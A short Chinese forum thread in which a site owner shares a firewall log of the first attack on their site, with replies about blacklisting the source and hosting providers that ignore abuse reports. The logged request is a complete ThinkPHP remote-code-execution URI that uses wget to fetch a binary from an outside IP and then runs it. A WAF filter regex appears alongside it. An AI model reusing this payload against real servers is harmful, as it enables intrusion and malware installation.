纪念下第一次被人攻击
用户IP 195.231.2.25类型 GET 过滤器 args
URI地址
/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars=shell_exec&vars[]=cd%20/tmp/%20;wget%20http://168.235.82.199/MavDDzxY/maddy.x86%20;chmod%20777%20*%20maddy.x86;%20%20./maddy.x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp
User-Agent
python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.9.1.el6.x86_64
过滤规则
(invokefunction|call_user_func_array|\\think\\)
传入值
function:call_user_func_array
风险值
call_user_func_array
这ip就在渗透,有点舍不得加黑名单,Google出来好像是阿鲁巴的
xiaonv110 发表于 2019-2-4 07:26
机场???????
不是机场,自己的站 168.235.82.199
这个病毒下载的ip是ramnode的,ramnode也不管吗》?已经abuse了,还是要自己动手D? 新建的站都会容易被攻击吧 大惊小怪系列
页:
[1]